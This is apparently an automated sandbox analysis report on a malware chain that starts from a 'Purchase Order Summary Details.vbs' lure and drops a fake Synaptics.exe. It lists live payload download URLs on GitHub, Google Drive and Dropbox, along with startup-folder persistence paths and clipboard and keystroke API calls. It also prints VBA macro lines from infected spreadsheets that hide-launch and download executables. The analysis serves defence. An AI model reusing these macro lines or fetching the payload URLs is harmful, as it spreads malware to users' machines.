                                Source: Synaptics.exe, 00000010.00000002.2255302411.000000000E97C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2260579766.000000000EB4E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2264469193.000000000EC8F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2294925347.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA5F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2258985137.000000000EAE7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2296543685.000000001D617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000010.00000002.2223139983.0000000007495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~H
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~_R
                                Source: Synaptics.exe, 00000010.00000002.2223139983.00000000075B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~f
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: update.exe, 0000000E.00000003.1438685808.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000010.00000002.2215408507.0000000004DA0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2300328253.000000001D727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                                Source: Synaptics.exe, 00000010.00000002.2223139983.000000000752C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2215408507.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2302736107.000000001D864000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2257630268.000000000EA2E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2302187436.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2221900650.0000000007443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2262288877.000000000EBFC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000010.00000002.2211766552.00000000006F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                Source: wscript.exe, 00000000.00000003.1311634064.00000194116A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312583846.00000194116A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comMicrosoft
                                Source: wscript.exe, 00000000.00000002.1312382254.000001940EFC9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310308003.000001940EFC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310253929.000001940EFA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/
                                Source: wscript.exe, wscript.exe, 00000000.00000002.1312536779.00000194110E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312928343.0000019411EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1312434862.000001940F275000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main
                                Source: wscript.exe, 00000000.00000002.1312291489.000001940EFA3000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Summary Details.vbsString found in binary or memory: https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/JPS.exe
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000010.00000003.1528901179.000000000069E000.00000004.00000020.00020000.00000000.sdmp, ~DF16C6BEDBEDB6C577.TMP.18.dr, ~$cache1.16.dr, RCXD42.tmp.14.dr, update.exe.0.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50216
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50215
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50218
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50219
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50139 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50151 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50210
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50225 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50202 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50214
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50213
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50226
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50228
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50221
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50220
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50222
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50225
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50224
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50234
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50236
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50235
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50127 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50175 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50213 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50128
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50127
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50121
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50111 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50152 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50204
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50209
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Code function: 15_2_00177099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Code function: 15_2_00177294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe, Code function: 22_2_008D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Code function: 31_2_00177294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Code function: 15_2_00164342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput

                                System Summary

                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: uvpPtB1E.xlsm.16.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: UNKRLCVOHV.xlsm.16.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: uvpPtB1E.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: UNKRLCVOHV.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: uvpPtB1E.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: UNKRLCVOHV.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: uvpPtB1E.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: UNKRLCVOHV.xlsm.16.dr, Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: Purchase Order Summary Details.vbs, Static file information: Suspicious name
                                Source: C:\Windows\System32\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exe, COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_001229C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,15_2_001229C2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_001902AA NtdllDialogWndProc_W,15_2_001902AA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018E769 NtdllDialogWndProc_W,CallWindowProcW,15_2_0018E769
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018EA4E NtdllDialogWndProc_W,15_2_0018EA4E
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018EAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,15_2_0018EAA6
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0013AC99 NtdllDialogWndProc_W,15_2_0013AC99
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,15_2_0018ECBC
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0013AD5C NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,15_2_0013AD5C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0013AFB4 GetParent,NtdllDialogWndProc_W,15_2_0013AFB4
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,15_2_0018EFA8
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F0A1 SendMessageW,NtdllDialogWndProc_W,15_2_0018F0A1
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,15_2_0018F122
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F37C NtdllDialogWndProc_W,15_2_0018F37C
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F3AB NtdllDialogWndProc_W,15_2_0018F3AB
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F3DA NtdllDialogWndProc_W,15_2_0018F3DA
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F425 NtdllDialogWndProc_W,15_2_0018F425
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F45A ClientToScreen,NtdllDialogWndProc_W,15_2_0018F45A
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018F594 GetWindowLongW,NtdllDialogWndProc_W,15_2_0018F594
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0013B7F2 NtdllDialogWndProc_W,15_2_0013B7F2
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0013B845 NtdllDialogWndProc_W,15_2_0013B845
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018FE7D NtdllDialogWndProc_W,15_2_0018FE7D
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018FE80 NtdllDialogWndProc_W,15_2_0018FE80
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,15_2_0018FF04
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe Code function: 15_2_0018FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,15_2_0018FF91
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008829C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,22_2_008829C2
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008F02AA NtdllDialogWndProc_W,22_2_008F02AA
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EE769 NtdllDialogWndProc_W,CallWindowProcW,22_2_008EE769
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,22_2_008EEAA6
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 22_2_008EEA4E NtdllDialogWndProc_W,22_2_008EEA4E
